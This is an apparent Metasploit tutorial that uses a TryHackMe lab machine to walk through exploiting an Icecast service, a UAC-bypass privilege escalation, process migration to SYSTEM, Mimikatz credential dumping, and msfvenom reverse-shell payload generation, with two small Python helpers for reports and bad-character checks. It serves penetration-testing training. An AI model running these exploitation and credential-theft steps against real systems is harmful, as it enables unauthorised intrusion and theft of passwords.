Metasploit describes itself as a “penetration testing framework.” This means that for anything pentesting-related, Metasploit has a tool. We can use it to gather info, gain access, conduct all types of attacks, and even cover our tracks.
It has over 2000 exploits for different services and operating systems. It also has 1000+ modules we can use for information gathering, scanning, and enumeration. This is a MUST-HAVE tool for network pentesting.
This lesson will cover:
- Understanding Metasploit’s core services and commands
- Using Metasploit to hack into a Windows machine, discover exploits, and execute them
- Saving your work on Metasploit to a database
- A brief overview of Msfvenom, a payload generator that comes with Metasploit
This lesson uses a Kali Linux OS. Metasploit is installed by default, but if you don’t have it, execute these commands:
sudo apt update
sudo apt install metasploit-framework
Run this command to start Metasploit:
msfconsole
First, let’s understand Metasploit’s directory structure.
We’ll cover the core directories: Documentation, Data, Lib, Modules, Plugins, Scripts, and Tools.
DOCUMENTATION
This stores documentation about all the services Metasploit offers.
You’ll spend a lot of time reading these. I suggest exploring one:
DATA
This directory holds files used for exploits, binaries needed for specific exploits, images, evasion tools, wordlists, post exploits, shellcode, and more.
LIB
All the ruby library scripts used by Metasploit’s modules are here.
MODULES
This directory contains all the modules for auxiliary, encoders, evasion, exploits, nops, payloads, and post exploits.
PLUGINS
As you can see below, the directory holds ruby scripts for a variety of plugins.
SCRIPTS
This directory contains ruby scripts for Meterpreter and other tools.
TOOLS
Lastly, the tools directory holds various ruby scripts for even more tools.
Now that we’ve covered the key directories, let me show you commands that will help you interact with this wide-ranging tool.
As you work through this guide, understand that learning Metasploit is like learning Python. It’s a skill, and you won’t reach mastery in one day.
COMMANDS THAT WILL HELP YOU INTERACT WITH METASPLOIT
“help” or “?”
“?” simply takes you to the help menu. From there, we can see information about all the Metasploit commands and their use.
You can also pass a command name, as in “help <command_name>”, to show information about that specific command. Like this:
show
This command displays information for things like exploits, payloads, encoders, auxiliary, and more.
info
This command is like “help,” but for what’s in the modules directory, where exploits, encoders, payloads, etc., reside.
It will show information like the payload type, the privilege level needed, and other details we need before executing it. The syntax is ‘info <path_of_module>’.
Before I show you the info command in action, let me explain Payload Types in Metasploit.
Payload Types
Metasploit has 3 primary types of payloads: singles, stagers, and stages.
Each has a unique role:
Singles
- This is a self-contained payload for a specific task. No additional files need to be downloaded. Because everything is contained in one piece, this type of payload is more stable.
Stagers
- Stagers establish a network connection between the target system and Metasploit. Once the connection is made, the attack machine sends additional payloads (called stages) to the target.
Stages
- Stages are payload components. Once a stager payload has connected to the target system, it downloads additional payloads onto the target; these are called “stages.”
Look at the image below. We can see what type of payload it is, and the variables required by the payload. I’ll show you how to set those variables in a moment.
use
Let’s say you decide to use an exploit. You’ll run this command:
use <exploit_path>
You can then type “info” into the terminal, and you’ll see more information. Like this:
options
After running the “use” command, the “options” command will let you know what variables are required by the exploit.
set
Once you know what’s required, use the set command to define the variables.
RHOSTS was empty earlier, but now it has the value we assigned it.
unset
This unsets the variable. Like so:
exploit
Once the variables are set, you can exploit the machine. In this example, I’m using this TryHackMe machine.
First, open a terminal and run this command:
sudo openvpn Downloads/<your_vpn_config_file>
In Metasploit, run this command:
use exploit/windows/http/icecast_header
I’ll show you later how I discovered that the machine is vulnerable to this exploit. For now, just follow along.
Now run the options command to figure out what you need:
Set the RHOSTS and LHOST.
Then use the “exploit” command. A Meterpreter shell initiates. Enter the command “sysinfo”.
Voila! Now that we’re inside the Meterpreter shell, don’t forget to run help and familiarize yourself with it.
run
You’ve successfully penetrated a machine. Now, let’s run a script to get additional information. Use this command:
run post/multi/recon/local_exploit_suggester
Looks like we have a few vulnerabilities!
background
This command backgrounds our current session.
Run this command:
background
Let’s use the exploit at this location: exploit/windows/local/bypassuac_eventvwr
We need a session value, the LHOST, and the LPORT.
First, let’s deal with sessions. Execute this command to see the available sessions:
sessions -l
We have one session. We’ll use that.
Let’s set LHOST (the local host, i.e. the address we listen on) to tun0.
If you look back to our previous exploit, we already have an active connection on port 4444.
This exploit will fail if we use that port. I’ll go with 1337 for LPORT.
Let’s fill the options.
The exploit was successful. We also have a new Meterpreter session.
Run the getprivs command. This shows us our privileges. Because of the exploit, we have expanded privileges that can be used maliciously.
We’re still not a “system” user yet. To get there, we need to migrate our process into a process running as NT AUTHORITY\SYSTEM. That’s the highest-privileged account in a Windows OS.
Run the ps command to see the processes currently running:
Let’s migrate the process our exploit is running on to a different process. I’ll go with spoolsv.exe (near the bottom, PID 1276.)
Run this command:
Perfect. Time to find out even more information!
Use this command to load Mimikatz:
load kiwi
I suggest looking at the Mimikatz hyperlink, since it’s an excellent post-exploitation tool. We can steal passwords and more with it!
Run the help command to see which command you might use:
Let’s go with creds_all.
exit
This command will help you exit a Meterpreter shell. Go ahead and run it.
sessions -k
Now let’s kill the session.
back
This takes us back to the previous stage (before we started the exploit.)
Great work so far! I think you have the basics now. Let’s go further.
search
In my opinion, this is the most important command in Metasploit. Your success depends on first finding the right exploit, payload, auxiliary, etc.
For example: imagine you have access to a machine, and you want to find passwords on it. You need a post exploit. Here’s how you can use search to find that:
search type:post password
You’ll see a list of all the password-related exploits Metasploit has to offer.
Finding exploits with CVE numbers.
Use this command to search by CVE year.
search cve:2022
Use this command to find exploits by their exact CVE number.
search cve:<year>-<number>
This command finds exploits based on the OS and date.
search type:exploit platform:<platform_of_concern> date:<year>
Let’s try removing the platform and viewing everything.
search type:exploit platform:-linux date:2022
A leading minus on a search term negates it, so this lists every 2022 exploit that is not for Linux.
MSFDB (Metasploit Framework Database): one of Metasploit’s most time-saving tools
A lot of Metasploit tools require a database. Plus, importing information into the database, like Nmap scan results, can help you efficiently gather and consolidate information. This is tremendously helpful to have when writing reports.
Setup
Msfdb uses PostgreSQL. You need to start that first. Use this command in a terminal:
systemctl start postgresql
Now start Metasploit.
Within Metasploit, run the command below. It initializes the msfdb.
sudo msfdb init
There’s the username, the database, and the configuration file path. Run the command ‘db_status’ to check the status of the database.
Connect to the database using the config file.
Now let’s combine msfdb and Nmap. I’ll use this vulnerable machine from TryHackMe (if you have been following along from the beginning, it is the same room we used earlier; it’s named Ice.)
First, scan the machine.
You might be thinking “If I can do this with Nmap, why do this inside Metasploit?” Great question. Just stay with me, and you’ll find out.
Let the scan finish and run the command “services”. You will be able to see open ports, the associated protocols, their names, and information about them.
You can use the -c flag to filter these results, too.
As you can see, it’s running Icecast on port 8000. Let’s see if there’s an exploit associated with it.
There is! Earlier in the lesson, I mentioned that I would show how I determined that the machine was vulnerable in this way. This is how I discovered that.
Now let’s use it and determine our requirements.
Set the RHOSTS (change this to your vulnerable machine’s IP) and LHOST (set to tun0)
Now run the exploit.
Let’s background this for now.
Run the command ‘vulns.’ You’ll see that msfdb has stored this vulnerability.
Head back to the Meterpreter session.
sessions -i <session_id>
Now run this command:
run post/multi/recon/local_exploit_suggester
It shows us more exploits. Let’s go with the one titled “/windows/bypassuac_eventvwr” (option 7.)
Use it. View the options and fill in the SESSION and LHOST variables. Set SESSION to 1 and LHOST to tun0. Then run the exploit.
When it’s complete, migrate the process like we did earlier.
Load Mimikatz again. Let’s dump the passwords with the creds_all command.
Background the session. Let’s see if we can find a way to crack any of these hashes.
Let’s go with module 6. View the options; we only need a session. Set it to the one we just backgrounded.
Now run the command “creds”. You’ll see that everything is stored for you.
Let’s export the database contents with this command:
db_export -f xml msfoutput.xml
This is infinitely more efficient than manually documenting everything. As you work, Metasploit can store everything on the database for you.
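As an added example that is not part of the lesson, here is a small Python script that turns a db_export XML file into a report-ready summary of open services and recorded vulns per host. The element layout (MetasploitV5/hosts/host with services/service and vulns/vuln/refs/ref) is an assumption about the export format, and the embedded sample export is constructed, with placeholder host, ports and CVE id.

```python
"""Summarise a Metasploit db_export XML file for a report (added example)."""
import xml.etree.ElementTree as ET
# Constructed sample in the assumed layout of `db_export -f xml`; the host,
# ports and CVE id are placeholders, and a real export carries more fields.
SAMPLE_EXPORT = """<?xml version="1.0"?>
<MetasploitV5>
  <hosts><host>
    <address>10.10.10.10</address><os_name>Windows 7</os_name>
    <services>
      <service><port>135</port><proto>tcp</proto><state>open</state><name>msrpc</name><info></info></service>
      <service><port>8000</port><proto>tcp</proto><state>open</state><name>http</name><info>Icecast streaming media server</info></service>
      <service><port>3389</port><proto>tcp</proto><state>closed</state><name>ms-wbt-server</name><info></info></service>
    </services>
    <vulns><vuln><name>exploit/windows/http/icecast_header</name><refs><ref>CVE-0000-0000</ref></refs></vuln></vulns>
  </host></hosts>
</MetasploitV5>
"""

def summarize_export(xml_text):
    """Return {address: {"os": str, "open_ports": [...], "vulns": [...]}}."""
    root = ET.fromstring(xml_text)
    summary = {}
    for host in root.iterfind(".//host"):
        addr = host.findtext("address", default="?")
        entry = {"os": host.findtext("os_name", default="unknown"),
                 "open_ports": [], "vulns": []}
        for svc in host.iterfind("services/service"):
            if svc.findtext("state") != "open":
                continue  # closed/filtered ports only add noise to the report
            entry["open_ports"].append((int(svc.findtext("port")), svc.findtext("proto"),
                                        svc.findtext("name") or "", (svc.findtext("info") or "").strip()))
        for vuln in host.iterfind("vulns/vuln"):
            refs = [r.text for r in vuln.iterfind("refs/ref") if r.text]
            entry["vulns"].append((vuln.findtext("name"), refs))
        summary[addr] = entry
    return summary

def render_report(summary):
    """Plain-text table: one block per host, open ports first, then vulns."""
    lines = []
    for addr, e in sorted(summary.items()):
        lines.append(f"Host {addr} ({e['os']})")
        for port, proto, name, info in sorted(e["open_ports"]):
            lines.append(f"  {port:>5}/{proto:<4} {name:<14} {info}".rstrip())
        for name, refs in e["vulns"]:
            lines.append(f"  VULN {name} [{', '.join(refs)}]")
    return "\n".join(lines)

if __name__ == "__main__":
    print(render_report(summarize_export(SAMPLE_EXPORT)))
```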
Last section: Msfvenom
Msfvenom is a payload generator. You can use it to generate custom payloads for all types of targets. Let’s see some examples:
Start with the help command. We’ll go over the core options:
-l <type>
This lists all the modules you can use.
If you string options together, you can find payloads for certain platforms.
msfvenom -l payloads --platform "<platform_name>"
-p <path_of_payload> --list-options
Look at the command in the screenshot below. The -p selects a specific payload, and --list-options shows more info about it.
To save a payload as an .aspx file, you can run this command:
msfvenom -p <payload_path> <set_requirement> -f aspx -o shell.aspx
The -p option selects the payload. When I viewed the options for this payload, LHOST and LPORT were required. That’s why I set them.
-f formats it to aspx, and -o (output) saves the file as shell.aspx.
How about running the payload as a Python script? Look below:
The -v option is used to choose the variable name.
-b means “bad characters.” It prevents the payload from using those characters, since the inclusion of certain characters can ruin buffer overflow-type exploits.
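As an added example that is not part of the lesson, the following Python script rebuilds the byte string from msfvenom’s -f py output and checks it against the -b list, a quick way to confirm that no bad character slipped through before the payload is used. The variable name shellcode (as set with -v), the filler bytes and the sample output are constructed, not real msfvenom output.

```python
"""Check msfvenom -f py output against its -b bad-character list (added example)."""
import ast
import re

# Constructed stand-in for the output of `msfvenom ... -f py -v shellcode`.
# The bytes are filler for the demonstration, not a real payload; \x0a and
# \x00 are planted so the check has something to find.
SAMPLE_PY_OUTPUT = '''shellcode =  b""
shellcode += b"\\x90\\x90\\x41\\x42\\x0a\\x43"
shellcode += b"\\x44\\x00\\x45\\x46"
'''

def parse_py_payload(text, var="shellcode"):
    """Rebuild the bytes from the `var = b""` / `var += b"..."` lines msfvenom emits."""
    assign = re.compile(r'^\s*' + re.escape(var) + r'\s*\+?=\s*(b"[^"]*")\s*$', re.M)
    chunks = [ast.literal_eval(m.group(1)) for m in assign.finditer(text)]
    if not chunks:
        raise ValueError(f"no assignments to {var!r} found in input")
    return b"".join(chunks)

def parse_badchars(spec):
    """Turn a -b argument such as '\\x00\\x0a\\x0d' into a set of byte values."""
    return {int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", spec)}

def find_badchars(payload, badchars):
    """Return (offset, byte) for every payload byte that is on the -b list."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]

if __name__ == "__main__":
    payload = parse_py_payload(SAMPLE_PY_OUTPUT)
    hits = find_badchars(payload, parse_badchars(r"\x00\x0a\x0d"))
    for off, b in hits:
        print(f"bad char 0x{b:02x} at offset {off}")
    print("clean" if not hits else f"{len(hits)} bad character(s) found")
```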
That’s all for now. Thanks for hanging in there! This was a LOT. Again, Metasploit is like Python: it’s a skill, and you’ll improve the more you practice. I recommend you play around with it and get your hands dirty.